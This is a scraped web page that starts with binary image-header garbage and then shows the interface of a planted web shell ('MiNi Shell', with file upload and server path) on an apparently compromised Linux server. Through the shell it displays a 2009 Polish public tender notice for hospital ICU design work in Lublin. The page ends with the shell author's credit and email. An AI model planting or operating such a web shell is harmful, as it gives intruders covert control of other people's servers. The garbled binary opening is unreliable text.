JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090123/7676-N-2009.html

<p class="kh_header"><b>Lublin: Wykonanie  dokumentacji Projekt Budowlano-Wykonawczy wraz z nadzorem autorskim dla zadania inwestycyjnego pn. Przystosowanie pomieszczeń III  Oddziału Onkologii Ginekologicznej na Oddział Intensywnej Terapii na 2 p. pawilonu łóżkowego szpitala COZL.</b><br>
<b>Numer ogłoszenia: 7676 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Onkologii Ziemi Lubelskiej , ul. Jaczewskiego 7, 20-090 Lublin, woj. lubelskie, tel. 081 7477511, faks 081 7478911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cozl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  dokumentacji Projekt Budowlano-Wykonawczy wraz z nadzorem autorskim dla zadania inwestycyjnego pn. Przystosowanie pomieszczeń III  Oddziału Onkologii Ginekologicznej na Oddział Intensywnej Terapii na 2 p. pawilonu łóżkowego szpitala COZL..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje kompleksowe wykonanie dokumentacji Projekt Budowlano-Wykonawczy wraz z nadzorem autorskim dla zadania inwestycyjnego pn. Przystosowanie pomieszczeń III  Oddziału Onkologii Ginekologicznej na Oddział Intensywnej Terapii na 2 p. pawilonu łóżkowego szpitala COZL. W skład dokumentacji projektowej wchodzi także przebudowa pomieszczeń sprężarkowni wraz z zasilaniem zespołu sprężarek obsługujących OIT i Blok Operacyjny.
Dokumentacja projektowa powinna zawierać:
2.1.    Projekt budowlano-wykonawczy wielobranżowy dla potrzeb przebudowy, a w szczególności:
2.1. 1.projekt technologiczny
2.1.2. projekt architektoniczny
2.1.3. projekt konstrukcji
2.1.4. projekt instalacji wod. - kan.
2.1.5. projekt wentylacji mechanicznej i klimatyzacji
2.1.6. projekt instalacji elektrycznych (w tym zasilanie sprężarkowi i wymiana UPS)
2.1.7. projekt instalacji niskoprądowych (teletechnicznych i specjalnych)
2.1.8. projekt instalacji wewnętrznej c.o.
2.1.9. projekt instalacji gazów medycznych wraz ze sprężarkownią
2.1.10. kosztorysy inwestorskie dla każdej branży oddzielnie
2.1.11. przedmiary robót dla każdej branży oddzielnie
2.1.12. Specyfikację wykonania i odbioru robót dla każdej branży oddzielnie;
2.2. Wszystkie niezbędne pozwolenia, opinie, uzgodnienia i sprawdzenia projektów w zakresie wynikającym z przepisów szczegółowych oraz oświadczenie (uzgodnienia) o wzajemnym, międzybranżowym skoordynowaniu technicznym rozwiązań projektowych osób posia­dających uprawnienia budowlane do projektowania w odpowiedniej specjalności. Zamawiający wymaga aby dokumentacja uzgodniona była przez Powiatowy Inspektorat Sanitarno-Epidemiologiczny w Lublinie.
2.3.  Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, dla   opracowania planu bezpieczeństwa i ochrony zdrowia, w szczególności ze wskazaniem czy w trakcie budowy wykonywany będzie przynajmniej jeden z rodzajów robót wymienionych w art. 21a, ust.2 ustawy Prawo budowlane. 
Informacja winna uwzględniać warunki Rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu  bezpieczeństwa i ochrony zdrowia (Dz. U. nr 120, poz.1126).
3.Dokumentacja projektowa powinna zostać opracowana w 4 egzemplarzach w wersji papierowej oraz na nośniku elektronicznym z zastrzeżeniem, opracowania w pkt 2.1.10  i 2.1.11 winny być możliwe do odczytania w programie NORMA. 
4.Do opracowania dokumentacji projektowej zamawiający przekazuje następujące dane:
program funkcjonalno-użytkowy,
posiadaną dokumentację stanu istniejącego.
5.Dokumentacja projektowa przedmiotu zamówienia powinna uwzględniać optymalizację struktury komunikacyjnej przedmiotowych       Oddziałów w rozumieniu pkt. 6  ze Szpitalem i wykaz niezbędnych pomieszczeń dla tego typu obiektów.
6.W ramach dokumentacji technicznej należy uwzględnić pełny zakres zastosowania instalacji medialnych (wszystkie instalacje niezbędne do prawidłowego funkcjonowania OIT i Oddziału Onkologii Ginekologicznej, Radioterapii i Chemioterapii) dla tego typu obiektów
7.Dokumentacja powinna być opracowana zgodnie z aktualnie obowiązującymi przepisami, niniejszą SPECYFIKACJĄ oraz PROGRAMEM FUNKCJONALNO-UŻYTKOWYM. 
8.W ramach dokumentacji technicznej należy uwzględnić powiązanie wszystkich nowych instalacji medialnych z istniejącymi zachowując ich wzajemną kompatybilność.
9.W ramach przedmiotowego zadania należy uwzględnić zakres projektu sprężarkowi powietrza i instalacji sprężonego powietrza do Bloku Operacyjnego i OIT  oraz ich wzajemne powiązanie. 
10.Wykonawca dokumentacji technicznej w każdej fazie realizacji powinien konsultować z Zamawiającym przyjęte założenia i zakres realizacji oraz uzyskać pisemne uzgodnienie z użytkownikiem. 
11.Dokumentacja projektowa musi być opracowana w sposób zgodny z wymaganiami:
a) ustawy z dnia 7 lipca 1994 Prawo budowlane (tekst jednolity Dz. U. z 2000 r. nr 106, poz.1126 z późn. zm.), 
b) ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2004r. Nr 19, poz. 177, Nr 96, poz. 959, Nr 116, poz    1207, Nr 145, poz. 1537 i Nr 273, poz.2703 z 2005r. Nr 163, poz.1362, Nr 184, poz. 1539 z 2006r. Nr 79, poz. 551), 
c)Rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 10 listopada 2006 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej ( Dz. U. Nr 213 poz.1568), 
d)Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych , jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75 poz.690 z późn. zm.),
e)Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202 poz. 2072), obowiązujących obecnie szczegółowych przepisów prawnych i rozwiązań prawno - technicznych w zakresie projektowania budowlanego i instalacyjnego w obiektach służby zdrowia w zakresie OIT, aktualnie obowiązujących Polskich Norm a także zgodnie z zasadami wiedzy technicznej oraz niniejszymi Założeniami do projektowania.
f)Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie metod sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych, określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389)
12.Do projektu Wykonawca załącza wykaz opracowań dokumentacji projektowej oraz pisemne oświadczenie, że dokumentacja jest wykonana zgodnie z umową i jest kompletna z punktu widzenia celu, któremu ma służyć.
13.Dokumentacja projektowa po zatwierdzeniu przez Zamawiającego będzie służyć do realizacji pełnego zakresu robót budowlanych, niezbędne dla użytkowania obiektu zgodnie z jego przeznaczeniem.
14.Dokumentacja projektowa w swej treści powinna określać przedmiot zamówienia, w tym w szczególności: tech­nologię wykonania i odbioru robót, materiały, maszyny i urządzenia w sposób nie utrudniający uczciwej konkurencji.
15.Dokumentacja projektowa powinna określać w sposób jednoznaczny i nie budzący wątpliwości parametry techniczne i funkcjonalne przyjętych rozwiązań materia­łowych, maszyn, urządzeń i wyposażenia oraz wybranej technologii.
16.Dokumentacja projektowa powinna opisywać przedmiot zamówienia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane (podane w obwieszczeniach Prezesa Polskiego Komitetu Normalizacyjnego w sprawie wykazu norm zharmonizowanych, M. P. z 2003r. nr 46, poz.693, z 2004r. nr 7, poz.117 i nr 17, poz.297).
17.W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się:
1) wspólne specyfikacje techniczne;
2) Polskie Normy przenoszące normy europejskie;
3) normy państw członkowskich Unii Europejskiej przenoszące europejskie normy zharmonizowane;
4) Polskie Normy wprowadzające normy międzynarodowe;
5) polskie aprobaty techniczne.
18.Wykonawca, za zgodą Zamawiającego, może odstąpić od opisywania przedmiotu zamówienia z uwzględnieniem Polskich Norm przenoszących europejskie normy zharmonizowane, europejskie aprobaty techniczne lub wspólne specyfikacje techniczne, jeżeli:
          1)     nie zawierają one żadnych wymagań dotyczących zapewnienia zgodności z wymaganiami zasadniczymi;
2)ich stosowanie nakładałoby na Zamawiającego obowiązek używania wyrobów nie współdziałających z już sto­sowanymi  urządzeniami.
19.Zamawiający wymaga by Wykonawca prowadził  nadzór autorski w okresie realizacji zadań prowadzonych na podstawie  dokumentacji projektowej.
20.Zamawiający dopuszcza możliwość udziału podwykonawców w  realizacji niniejszego zamówienia z wyjątkiem nadzoru autorskiego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.10.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Warunkiem udziału w postępowaniu jest spełnianie postanowień określonych w art. 22 ust. 1 ustawy prawo zamówień  publicznych, a w szczególności następujących  wymagań:  
1.1. Dysponowanie osobami posiadającymi odpowiednie uprawnienia projektowe  bez  ograniczeń w  specjalności:
              a) architektonicznej
	        b) konstrukcyjno-budowlanej,
     c) instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,  wodociągowych i kanalizacyjnych;
	     d) instalacyjnej w zakresie instalacji i urządzeń elektrycznych, elektroenergetycznych;

      - podstawa prawna: art. 14 ustawy prawo budowlane z dnia 7 lipca 1994 r. (tekst jednolity Dz. U. z  2006 r. nr 156, poz. 1118.),  posiadającymi ważne zaświadczenia o przynależności do właściwej okręgowej izby  samorządu zawodowego.

1.2.  Wykazanie się co najmniej jedną wykonaną lub wykonywaną usługą projektową w zakresie odpowiadającym swoim rodzajem i wartością usłudze stanowiącej przedmiot  zamówienia, o wartości co najmniej 50 000,00 zł brutto, wykonanej w ciągu ostatnich 3 lat przed  dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie. 
1.3.   Posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

2.Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu. 
       2.1. Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o  przedłożone przez wykonawców         dokumenty i oświadczenia wg formuły spełnia-nie spełnia
      2.2. Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających spełnianie wymaganych warunków zostaną wykluczeni z postępowania, a ich oferty zostaną uznane za odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenia:
	1.1.Oświadczenie o spełnieniu warunków udziału w postępowaniu.
2.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia  2004 r. - Prawo zamówień publicznych, należy złożyć następujące dokumenty:
2.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert.
2.2. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

c)W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy oraz doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, należy złożyć następujące dokumenty:
3.1.Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, posiadających odpowiednie uprawnienia do projektowania bez ograniczeń w specjalności: 
	        a) architektonicznej
	        b) konstrukcyjno-budowlanej,
                           c) instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,  wodociągowych i   kanalizacyjnych;
	        d) instalacyjnej w zakresie instalacji i urządzeń elektrycznych, elektroenergetycznych;   
wraz z ważnymi zaświadczeniami o przynależności do właściwej okręgowej izby samorządu zawodowego (podstawa prawna - art. 14 ustawy z dnia 7 lipca 1994 r. Prawo budowlane t.j. Dz. U. z 2006 r. Nr 156, poz. 1118).
W przypadku podania w wykazie osób, którymi wykonawca dopiero będzie dysponował, należy  przedstawić pisemne zobowiązanie
innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 
3.2.Wykaz usług  wykonanych lub wykonywanych w okresie ostatnich 3 (trzech) lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Niniejszy wykaz winien zawierać minimum 1 usługę w zakresie projektowania odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia,  o wartości co najmniej 50 000,00 zł brutto  z podaniem jej wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługa ta została wykonana należycie.

4.W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
4.1.Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
5.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów opisanych w pkt. 2.1., 2.2. należy złożyć dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
5.1.nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
5.2.nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert; 
5.3.nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
6.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 5, zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy dotyczące terminów  wystawienia stosuje się odpowiednio.
7.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
	7.1.Wymagany w pkt. 1.1.; 2.1; 2.2; 4.1 dokument winien złożyć każdy wykonawca.
7.2.Pozostałe wymagane dokumenty, o których mowa w pkt.3.1; 3.2  mogą  być złożone oddzielnie lub wspólnie przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.
	7.3.Konsorcjum, jako całość spełni wymagane warunki, jeżeli z przedłożonych dokumentów, o których mowa w:
a)  pkt. 1.1.; 2.1; 2.2; będzie wynikało, że żaden z sygnatariuszy umowy konsorcjum  
nie będzie podlegał wykluczeniu z postępowania odpowiednio na podstawie art.22 i art.24  ust. pkt.4-9 ustawy     Prawo zamówień publicznych,
b) pkt.4.2 będzie wynikało, że każdy z  sygnatariuszy umowy konsorcjum  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
c) 3.1; 3.2;  będzie wynikało, że łącznie sygnatariusze umowy konsorcjum: 	                      
                       -  dysponują osobami z uprawnieniami budowlanymi wymienionymi w pkt.3.1,
                                                  - wykonali lub wykonują w okresie ostatnich 3 (trzech) lat przed dniem wszczęcia postępowania o udzielenie                     zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 usługi w zakresie projektowania odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia,  o wartości co najmniej 50 000,00 zł brutto każda z podaniem jej wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługa ta została wykonana należycie,  o czym mowa w pkt. 3.2.
8.Dokumenty potwierdzające spełnianie wymaganych warunków sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 
9.W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia ( np. w ramach spółki cywilnej lub konsorcjum), wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i składają jedną ofertę.
10.W przypadku gdy ofertę podpisuje osoba nie uprawniona do reprezentowania wykonawcy (zgodnie z odpisem z krajowego rejestru sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej) do oferty należy załączyć pełnomocnictwo do występowania w imieniu wykonawcy. 

UWAGA! 

1. Wszystkie powyższe dokumenty winny być przedstawione w formie oryginałów lub kserokopii  
    poświadczonych na każdej  zapisanej stronie kserokopii za zgodność z oryginałem przez Wykonawcę lub  
    jego przedstawiciela umocowanego do składania oświadczeń woli w imieniu Wykonawcy.  
2. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu  
    wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości  
    co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.cozl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Onkologii Ziemi Lubelskiej w Lublinie, ul Jaczewskiego 7, 20-090 Lublin - Dział Zamówień Publicznych. Cena SIWZ 18 PLN..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2009 godzina 10:00, miejsce: Centrum Onkologii Ziemi Lubelskiej w Lublinie, ul Jaczewskiego 7, 20-090 Lublin - sekretariat- wysoki parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Osobami upoważnionymi do porozumiewania się z wykonawcami są: 
a) Hanna Bratek, Maria Korulczyk, Roumald Skawiński - tel. 081/747 75 11 w. 196 ; faks. 081/7476327;
b) Barbara Czarnecka-Łobko - tel. 081/747 75 11 w.221; faks 081/7476327;

Creat By MiNi SheLL
Email: jattceo@gmail.com